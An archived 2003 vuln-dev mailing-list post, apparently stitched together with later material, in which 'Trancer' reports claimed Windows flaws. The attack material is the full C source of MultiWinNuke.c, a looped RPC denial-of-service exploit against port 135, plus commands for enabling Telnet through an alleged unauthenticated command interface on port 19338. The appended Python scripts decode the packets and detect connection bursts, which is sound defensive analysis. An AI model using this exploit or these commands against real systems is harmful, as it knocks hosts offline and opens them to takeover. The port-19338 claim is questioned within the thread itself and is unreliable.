New Security Vulnerabilities

mba1_at_012.net.il
Date: 06/04/03

    To: vuln-dev@securityfocus.com
    Date: Tue, 3 Jun 2003 18:34:17 -0400
    
    

    Hello, I'm Moshe BA from Israel, a.k.a. Trancer, and I would like to report 4-5
    security bugs/vulnerabilities which I found.
    (Note: I'm sorry if my English is a bit bad, I'm an Israeli after all.)

    I've already talked with Dave McKinney via e-mail and he referred me to this
    e-mail address.
    This is the talk we had:

    From: Dave McKinney <dm@securityfocus.com>
    To: mba1@012.net.il <mba1@012.net.il>
    Subject: RE: New Security Vulnerabilities (fwd)
    Date: Tue, 3 Jun 2003 14:27:55 -0600 (MDT)

    Trancer,

    Can you send your report to the vuln-dev mailing list
    (vuln-dev@securityfocus.com)?

    Dave McKinney
    Symantec

    keyID: BF919DD7
    key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7

    On Tue, 3 Jun 2003, mba1@012.net.il wrote:

    > No you don't, that's what makes it so easy to hack Windows Server 2003. And
    > that's the reason I want this vulnerability to be reported.
    >
    > Original Message:
    > -----------------
    > From: Dave McKinney dm@securityfocus.com
    > Date: Tue, 3 Jun 2003 09:05:29 -0600 (MDT)
    > To: mba1@012.net.il
    > Subject: RE: New Security Vulnerabilities (fwd)
    >
    >
    >
    > Hmm do you need to enter the admin or other user password to access the
    > command line on port 19338?
    >
    > Dave McKinney
    > Symantec
    >
    > keyID: BF919DD7
    > key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7
    >
    >
    > On Mon, 2 Jun 2003, mba1@012.net.il wrote:
    >
    > > I prefer Trancer (over Moshe).
    > > I didn't really understand your question. Please ask again, but in an
    > > easier way (after all, I'm an Israeli).
    > >
    > > Original Message:
    > > -----------------
    > > From: Dave McKinney dm@securityfocus.com
    > > Date: Mon, 2 Jun 2003 16:34:47 -0600 (MDT)
    > > To: mba1@012.net.il, vuldb@securityfocus.com
    > > Subject: New Security Vulnerabilities (fwd)
    > >
    > >
    > >
    > > Moshe, with regards to issue #2, I am assuming you need valid credentials
    > > to access the command line interpreter on port 19338?
     
    Now, these are the security bugs/vulnerabilities.

    **********

    The first one is two Windows Server 2003 security vulnerabilities.

    1. Windows 2003 Server has a built-in Command Line Interpreter (I don't
    know if this service is enabled by default, but I've tested this on 9
    systems, and in 7 of them it worked), which means that you can send commands
    to it using the HTTP (TCP) method (the web browser) by trying to access the
    server on port 19338 like this:

    http://admin@<TargetIP>:19338/cmd.cgi?cmd=<EnterCommandHere>

    That will cause the server to run the command from the $ROOT$ drive,
    which may be either C/D/E or any other drive defined by the owner/admin
    of the machine.
    Note that no username or password is required.

    2. Windows 2003 Server has a built-in Telnet service (disabled by default)
    that listens for connections on port 3382.
    An attacker can exploit the first vulnerability (#1 above) and enter these
    commands there:

    "sc config TlntSvr start= auto"
    and then:
    "net start TlntSvr"

    Then the attacker has FULL access to the system.
    Only a password is required, and because I've just enabled this service,
    the password is also set to the default -
    Password: tlntadmn

    Note that if this service is already enabled, the password will be wrong
    (only if the system admin changed it).
    If that service is already enabled with another password, the attacker can
    open a sharing service or any other service that can give him easy
    access to the system.

    **********

    The second one is Windows NT (2000/XP/2003) ICMPv6 Flooding.
    This little Denial of Service attack works just like an ICMP flood, but it uses
    the Ping6 tool (in an IPv6-enabled Windows OS or an IPv6-enabled *nix OS).
    This attack is also good because Microsoft's Internet Connection Firewall
    is unable to block IPv6 traffic.
    This is maybe a slow attack, but effective; it also depends on the
    attacker's and victim's bandwidth.
    An exploit for this can be easily made, and I am working on one.

    **********

    This bug will make Windows XP (all editions) crash.
    Create 122 folders one inside the other, naming them with one character (like
    '1' or '0'). Now go to the one before the last directory and right-click the
    last folder. Hover the mouse over the pop-up menu and the system will crash.
    A stupid one, but it does crash the system.

    **********

    This is an upgraded exploit which will DoS and crash a remote machine using
    the WinNuke.c exploit that exploits the Microsoft Windows RPC Service Denial
    of Service Vulnerability.
    I've discovered that you can STILL DoS and crash it even if it's patched
    (with an official M$ patch) against it, by simply nuking it a lot of times,
    and fast.
    This is the exploit (MultiWinNuke.c a.k.a. FixedWinNuke.c):

    ### Start MultiWinNuke.c ###

    /*
     * Microsoft Windows NT RPC Service Denial of Service Vulnerability
     *
     * Original Code By Lion @ http://www.cnhonker.com
     * Upgraded By Trancer @ http://BinaryVision.tech.nu
     *
     * I have noticed that even after a Windows NT system is patched against this
     * vulnerability with an official M$ update, an attacker can still DoS that
     * system if he activates this exploit a lot of times, fast.
     * So I've upgraded the exploit by looping it and letting you control the
     * number of times you want to nuke a system
     * (with a patched 2000\XP 250-400 times is recommended).
     *
     * That's it. enjoy :-)
     */

    #include <winsock2.h>
    #include <stdio.h>
    #include <stdlib.h>   /* exit, atoi */
    #include <string.h>   /* memset, memcpy */

    #pragma comment(lib, "ws2_32.lib")

    char sendcode1[] =
      "\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00"
      "\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
      "\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f"
      "\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
      "\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00"
      "\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00"
      "\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00";

    char sendcode2[] =
      "\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00";

    char sendcode3[] =
      "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00";

    char sendcode4[] =
      "\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x3d\x3d\x3d\x3d"
      "\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d"
      "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
      "\x50\x10\x01\x00\x00\x00\x02\x00";

    char sendcode5[] =
      "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
      "\x80\xf9\x00\x00\x00\x00\x02\x00";

    char sendcode6[] =
      "\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
      "\xb0\xe2\x00\x00\x00\x00\x02\x00";

    char sendcode7[] =
      "\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x8f\x00\x00\x00"
      "\x60\x15\x00\x00\x00\x00\x02\x00";

    char sendcode8[] =
      "\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00";

    int main(int argc, char *argv[])
    {
      WSADATA wsaData;
      WORD wVersionRequested;
      struct hostent *pTarget;
      struct sockaddr_in sock;
      char *targetip;
      int port, bufsize, times, i;
      SOCKET s;
      char buffer[20480];

      printf("======================= Windows NT Multi RPC Nuke V0.12 ======================\r\n");
      printf("=============== Original Code By Lion @ http://www.cnhonker.com ==============\r\n");
      printf("============= Upgraded By Trancer @ http://BinaryVision.tech.nu ==============\r\n\n");

      if (argc < 2)
      {
        printf("Usage:\r\n");
        printf(" %s <TargetIP> <TargetPort> <BufferSize> <Times>\r\n", argv[0]);
        printf("Example: %s 198.167.0.1 135 512 250\r\n", argv[0]);
        printf("PS:\r\n");
        printf(" If target is XP, try 2 times.\r\n");
        exit(1);
      }

      wVersionRequested = MAKEWORD(1, 1);
      if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;

      targetip = argv[1];
      port = 135;                      /* default: the RPC endpoint mapper port */
      if (argc >= 3) port = atoi(argv[2]);
      bufsize = 512;                   /* accepted as in the original, but the send sizes below are fixed */
      if (argc >= 4) bufsize = atoi(argv[3]);
      (void)bufsize;
      times = 1;
      if (argc >= 5) times = atoi(argv[4]);

      /* Resolve the target once rather than on every iteration */
      printf("Resolving Hostnames...\n");
      if ((pTarget = gethostbyname(targetip)) == NULL)
      {
        printf("Resolve of %s failed, please try again.\n", targetip);
        WSACleanup();
        exit(1);
      }
      memset(&sock, 0, sizeof(sock));
      memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
      sock.sin_family = AF_INET;
      sock.sin_port = htons((USHORT)port);

      /* One complete nuke sequence per iteration, each on a fresh connection.
       * Only the for-header increments i; the original also did "i = i + 1"
       * inside the body, so it ran only half of the requested <Times>. */
      for (i = 0; i < times; i++)
      {
        s = socket(AF_INET, SOCK_STREAM, 0);
        if (s == INVALID_SOCKET)
        {
          printf("Socket error!\r\n");
          WSACleanup();
          exit(1);
        }

        printf("Connecting (%d/%d)...\n", i + 1, times);
        if (connect(s, (struct sockaddr *)&sock, sizeof(sock)) == SOCKET_ERROR)
        {
          printf("Couldn't connect to host.\n");
          closesocket(s);
          WSACleanup();
          exit(1);
        }

        printf("Connected!...\n");
        printf("Sending Packets...\n");
        /* DCE/RPC bind followed by the first fragment of a request */
        if (send(s, sendcode1, sizeof(sendcode1) - 1, 0) == SOCKET_ERROR)
        {
          printf("Error sending nuke Packets\r\n");
          closesocket(s);
          WSACleanup();
          exit(1);
        }

        /* Filler and further fragment headers, in the same order and sizes as the original */
        memset(buffer, '\x41', 240);
        send(s, buffer, 240, 0);

        send(s, sendcode2, sizeof(sendcode2) - 1, 0);
        memset(buffer, '\x42', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode3, sizeof(sendcode3) - 1, 0);
        memset(buffer, '\x43', 512);
        send(s, buffer, 512, 0);

        send(s, sendcode4, sizeof(sendcode4) - 1, 0);
        memset(buffer, '\x44', sizeof(buffer));
        send(s, buffer, sizeof(buffer), 0);

        memset(buffer, '\x44', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode5, sizeof(sendcode5) - 1, 0);
        memset(buffer, '\x45', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode6, sizeof(sendcode6) - 1, 0);
        memset(buffer, '\x46', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode7, sizeof(sendcode7) - 1, 0);
        memset(buffer, '\x47', 5000);
        send(s, buffer, 5000, 0);

        send(s, sendcode8, sizeof(sendcode8) - 1, 0);
        memset(buffer, '\x48', 5000);
        send(s, buffer, 5000, 0);

        closesocket(s);   /* the original leaked one socket per iteration */
      }

      if (times < 2)
      {
        printf("Nuked! If target is XP, try again! :)\r\n");
      }
      else
      {
        printf("%s was nuked %d times\r\n", targetip, times);
      }

      WSACleanup();
      return 0;
    }

    ### End MultiWinNuke.c ###

    That's it. Note that all of the bugs above were found by me, and I'll be glad if
    they are reported.
    Trancer

    --------------------------------------------------------------------
    mail2web - Check your email from the web at
    http://mail2web.com/ .
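What MultiWinNuke.c actually puts on the wire is easier to judge once the fixed byte strings are decoded. The following Python is an added example, not part of Trancer's post or of Lion's original exploit: it parses the connection-oriented DCE/RPC PDU headers in sendcode1 and sendcode7 (copied from the code above) using the standard CO-PDU layout (version, packet type, fragment flags, fragment length, call id, then the bind or request body). The interface UUID is reported but not named; only the transfer syntax is labelled, because 8a885d04-1ceb-11c9-9fe8-08002b104860 v2 is the standard NDR transfer syntax.

```python
"""Decode the DCE/RPC PDUs that MultiWinNuke.c writes to TCP/135.

Added example, not part of the original post or of Lion's exploit. The byte
strings are copied from sendcode1 and sendcode7 above; the layout decoded is
the standard connection-oriented DCE/RPC PDU header and bind/request bodies.
"""
import struct
import uuid

# sendcode1 from MultiWinNuke.c: 108 bytes (a bind PDU + the start of a request PDU).
SENDCODE1 = bytes.fromhex(
    "05000b03100000004800000002000000"
    "d016d016000000000100000000000100"
    "609ee7b9523dce11aaa100006901293f"
    "02000200045d888aeb1cc9119fe80800"
    "2b104860020000000500000110000000"
    "d01600008f0000002027010000000200"
    "f000000000000000f0000000"
)
# sendcode7 from MultiWinNuke.c: header of the request fragment flagged as the last one.
SENDCODE7 = bytes.fromhex("0500000210000000601500008f0000006015000000000200")

NDR_TRANSFER_SYNTAX = "8a885d04-1ceb-11c9-9fe8-08002b104860"
PTYPE_NAMES = {0: "request", 2: "response", 3: "fault", 11: "bind", 12: "bind_ack"}
PFC_FIRST_FRAG, PFC_LAST_FRAG = 0x01, 0x02


def ndr_uuid(raw16):
    """NDR writes the first three UUID fields little-endian."""
    return str(uuid.UUID(bytes_le=raw16))


def parse_pdu(buf, off=0):
    """Parse one CO-PDU starting at buf[off]; tolerate a truncated fragment."""
    if len(buf) - off < 16:
        raise ValueError("need 16 header bytes")
    vers, _minor, ptype, flags, _drep, frag_len, auth_len, call_id = struct.unpack_from(
        "<BBBB4sHHI", buf, off)
    if vers != 5:
        raise ValueError("not a DCE/RPC v5 header")
    avail = min(frag_len, len(buf) - off)
    pdu = {
        "ptype": ptype, "ptype_name": PTYPE_NAMES.get(ptype, "other"),
        "first_frag": bool(flags & PFC_FIRST_FRAG),
        "last_frag": bool(flags & PFC_LAST_FRAG),
        "frag_length": frag_len, "auth_length": auth_len, "call_id": call_id,
        "bytes_present": avail, "truncated": avail < frag_len,
    }
    body = off + 16
    if ptype == 11:                      # bind: presentation context negotiation
        max_xmit, max_recv, assoc, n_ctx = struct.unpack_from("<HHIB", buf, body)
        pdu.update(max_xmit_frag=max_xmit, max_recv_frag=max_recv, assoc_group=assoc)
        p, ctxs = body + 12, []          # 3 reserved bytes after the context count
        for _ in range(n_ctx):
            ctx_id, n_ts = struct.unpack_from("<HB", buf, p)
            p += 4
            abstract = (ndr_uuid(buf[p:p + 16]),) + struct.unpack_from("<HH", buf, p + 16)
            p += 20
            transfers = []
            for _ in range(n_ts):
                transfers.append((ndr_uuid(buf[p:p + 16]), struct.unpack_from("<I", buf, p + 16)[0]))
                p += 20
            ctxs.append({"ctx_id": ctx_id, "abstract": abstract, "transfer": transfers})
        pdu["contexts"] = ctxs
    elif ptype == 0:                     # request: alloc_hint, context id, opnum, stub data
        alloc_hint, ctx_id, opnum = struct.unpack_from("<IHH", buf, body)
        pdu.update(alloc_hint=alloc_hint, ctx_id=ctx_id, opnum=opnum,
                   stub_bytes_present=max(0, avail - 24))
    return pdu


def parse_stream(buf):
    """Walk back-to-back PDUs by frag_length; stop at the first truncated one."""
    pdus, off = [], 0
    while len(buf) - off >= 16:
        pdu = parse_pdu(buf, off)
        pdus.append(pdu)
        if pdu["truncated"]:
            break
        off += pdu["frag_length"]
    return pdus


def describe(pdu):
    flags = "+".join(n for n, on in (("FIRST", pdu["first_frag"]), ("LAST", pdu["last_frag"])) if on) or "middle"
    s = f"{pdu['ptype_name']:8} call_id={pdu['call_id']} frag_length={pdu['frag_length']} ({flags}"
    s += f", only {pdu['bytes_present']} bytes present)" if pdu["truncated"] else ")"
    if pdu["ptype"] == 11:
        for c in pdu["contexts"]:
            a, ts = c["abstract"], c["transfer"][0]
            s += f"\n    ctx {c['ctx_id']}: iface {a[0]} v{a[1]}.{a[2]} over {ts[0]} v{ts[1]}"
            s += " (NDR)" if ts[0] == NDR_TRANSFER_SYNTAX else ""
    elif pdu["ptype"] == 0:
        s += f"\n    opnum={pdu['opnum']} alloc_hint={pdu['alloc_hint']} stub bytes present={pdu['stub_bytes_present']}"
    return s


if __name__ == "__main__":
    for p in parse_stream(SENDCODE1) + [parse_pdu(SENDCODE7)]:
        print(describe(p))
```

Decoded, sendcode1 is a bind (call id 2, 5840-byte fragments) for one interface over NDR, followed by the header of a request with call id 143, opnum 2, PFC_FIRST_FRAG set and a declared fragment length of 5840 bytes, of which only 12 stub bytes are in sendcode1; the rest of each fragment is the 'A'/'B'/'C' filler the C code sends afterwards. sendcode5 through sendcode7 are further headers for the same call id and opnum, the last one flagged PFC_LAST_FRAG. Each connection therefore hands the RPC runtime one large multi-fragment request made almost entirely of filler, and the post's loop repeats that connection as many times as <Times> says.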
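From the defender's side, the loop in MultiWinNuke.c opens a fresh TCP connection to port 135 on every iteration, so a host being "nuked 250-400 times" shows up as a burst of connections from one source in a short span. The following is an added example, not from the post: a sliding-window counter over constructed firewall-style connection records. The log format, the addresses and the threshold/window values are all assumptions made for the example and should be adapted to local logs.

```python
"""Flag sources hammering TCP/135 the way MultiWinNuke.c's <Times> loop does.

Added example, not from the original post. The log format and addresses are
constructed for this example; threshold and window are assumptions to tune.
"""
from collections import defaultdict, deque
from datetime import datetime

# Constructed records (not real logs): "<ISO time> <proto> <src>:<sport> -> <dst>:<dport>"
# 192.0.2.10 opens seven connections to tcp/135 in four seconds (the nuke loop);
# 192.0.2.20 makes two ordinary RPC connections minutes apart; 192.0.2.30 talks HTTP.
SAMPLE_LOG = """\
2003-06-03T18:34:17 TCP 192.0.2.10:1054 -> 198.51.100.5:135
2003-06-03T18:34:17 TCP 192.0.2.10:1055 -> 198.51.100.5:135
2003-06-03T18:34:18 TCP 192.0.2.10:1056 -> 198.51.100.5:135
2003-06-03T18:34:18 TCP 192.0.2.10:1057 -> 198.51.100.5:135
2003-06-03T18:34:19 TCP 192.0.2.10:1058 -> 198.51.100.5:135
2003-06-03T18:34:19 TCP 192.0.2.10:1059 -> 198.51.100.5:135
2003-06-03T18:34:20 TCP 192.0.2.10:1060 -> 198.51.100.5:135
2003-06-03T18:30:01 TCP 192.0.2.20:3001 -> 198.51.100.5:135
2003-06-03T18:31:30 TCP 192.0.2.20:3002 -> 198.51.100.5:135
2003-06-03T18:34:18 TCP 192.0.2.30:2000 -> 198.51.100.5:80
"""


def parse_line(line):
    """Split one record into (timestamp, proto, src_ip, dst_ip, dst_port)."""
    ts, proto, src, _arrow, dst = line.split()
    src_ip = src.rsplit(":", 1)[0]
    dst_ip, dst_port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), proto, src_ip, dst_ip, int(dst_port)


def find_bursts(lines, dst_port=135, threshold=5, window_s=10):
    """Return {src_ip: start of the first burst} for every source that opened
    at least `threshold` TCP connections to dst_port inside any sliding
    window of window_s seconds. Records are sorted first so out-of-order
    log lines do not break the window."""
    events = sorted(parse_line(l) for l in lines if l.strip())
    recent = defaultdict(deque)      # per-source timestamps inside the window
    bursts = {}
    for ts, proto, src, _dst, port in events:
        if proto != "TCP" or port != dst_port:
            continue
        q = recent[src]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold and src not in bursts:
            bursts[src] = q[0]
    return bursts


if __name__ == "__main__":
    for src, first in find_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: burst of connections to tcp/{135} starting {first.isoformat()}")
```

The threshold is deliberately low so the constructed sample trips it; on a real network the normal rate of RPC endpoint-mapper connections from one client sets the baseline, and the exploit's per-iteration reconnect is what separates it from a single long-lived session.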


